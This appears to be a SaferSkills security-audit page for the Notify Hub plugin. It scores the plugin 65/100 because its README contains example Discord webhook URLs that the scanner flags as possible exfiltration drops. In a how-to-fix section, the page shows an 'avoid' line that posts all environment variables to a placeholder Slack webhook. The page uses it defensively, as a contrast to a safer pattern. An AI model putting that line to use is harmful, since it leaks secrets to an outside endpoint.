Notify Hub— plugin

Notify Hub — independently scanned and version-tracked by SaferSkills.

by GabrielBBaldez·Plugin·github.com/GabrielBBaldez/notify-hub

Is Notify Hub safe to install?

SaferSkills independently audited Notify Hub (Plugin) and scored it 65/100 (yellow). The audit ran 55 deterministic rules across Security, Supply Chain, Maintenance, Transparency, and Community; it found 31 high-severity and 0 lower-severity findings. The full rule-by-rule trace and per-finding evidence are below. Free, methodology-open.

Score
65/100
●●●●●●●○○○
↑ +0 since first scan (65 → 65)Re-scan~30s
Latest scan
ScannedJun 23, 2026 · 30d ago
Scans run2 over 90 days
Detectors55 checks · 5 categories
Findings0 warnings · 31 high
EngineSaferSkills 2b638c6
View methodology →
SaferSkills installs
This week0
This month0
All time0
CategoryWeightCategory scoreContribution
Securityprompt, exec, net, exfil, eval
35%
0
0.0 pts
Supply chainhash, typosquat, maintainer, lockfile
20%
100
20.0 pts
Maintenancestaleness, pinning, CI
15%
100
15.0 pts
TransparencySKILL.md, perms, README
15%
100
15.0 pts
Communityinstalls, verify, response
15%
100
15.0 pts

Findings & checks · 31 flagged

Securityscore 0 · 31 findings
HIGHSends data to a hardcoded chat or capture webhookSS-PLUGIN-SECRET-EXFIL-WEBHOOK-01 · Credential exfiltration · README.md×31
HIGHa hardcoded webhook is a ready-made data drop, but a legitimate notifier looks identical without more context — high, pending the shadow-window FP measurement.
Why it matters

This plugin embeds a chat-platform or request-capture webhook URL (alerts: https://discord.com/api/webhooks/111/aaa). Webhooks are the classic exfiltration drop: a plugin collects env, files, or system info and posts it to a hardcoded endpoint the attacker watches.

The exact value spotted
excerptREADME.md· markdown
743avatar-url: https://example.com/logo.png
744recipients:
745alerts: https://discord.com/api/webhooks/111/aaa
746devops: https://discord.com/api/webhooks/222/bbb
747general: https://discord.com/api/webhooks/333/ccc
Occurrences
31 occurrences · first at L745, also L746, L747 +28 more
Show all 31 locations
Line
File
L745
README.md
L746
README.md
L747
README.md
L752
README.md
L753
README.md
L775
README.md
L790
README.md
L793
README.md
L794
README.md
L797
README.md
L799
README.md
L1247
README.md
L1248
README.md
L1262
README.md
L1263
README.md
L1268
README.md
L1343
README.md
L1344
README.md
L1349
README.md
L1446
README.md
L1462
README.md
L1527
README.md
L1533
README.md
L1535
README.md
L1536
README.md
L1553
README.md
L1555
README.md
L1586
README.md
L1590
README.md
L1597
README.md
L1613
README.md
How to fix
Remove the hardcoded webhook URL; make any notification target user-configured and never send secrets through it.
  1. Replace the embedded webhook URL with a value the installing user supplies.
  2. Post only non-sensitive notification fields — never env vars, file contents, or credentials.
Avoidrequests.post("https://hooks.slack.com/services/T000/B000/XXXX", json={"env": dict(os.environ)})
Safer pattern# user-supplied target; send only a benign status message requests.post(config.webhook_url, json={"status": "build complete"})
Trace & refs
ruleSS-PLUGIN-SECRET-EXFIL-WEBHOOK-01sha256815e1f895b038d9brubric 365aacaView on GitHub
Supply chainscore 100 · 0 findings
All supply chain checks passedNo findings in this category for the latest scan.pass
Maintenancescore 100 · 0 findings
All maintenance checks passedNo findings in this category for the latest scan.pass
Transparencyscore 100 · 0 findings
All transparency checks passedNo findings in this category for the latest scan.pass
Communityscore 100 · 0 findings
All community checks passedNo findings in this category for the latest scan.pass
Vendor response · right of reply
Are you the maintainer? Submit a response →

Audit the pieces. Scan the whole. Decide.

~30 seconds. Free. No account. Every finding cites a rule and a line of evidence.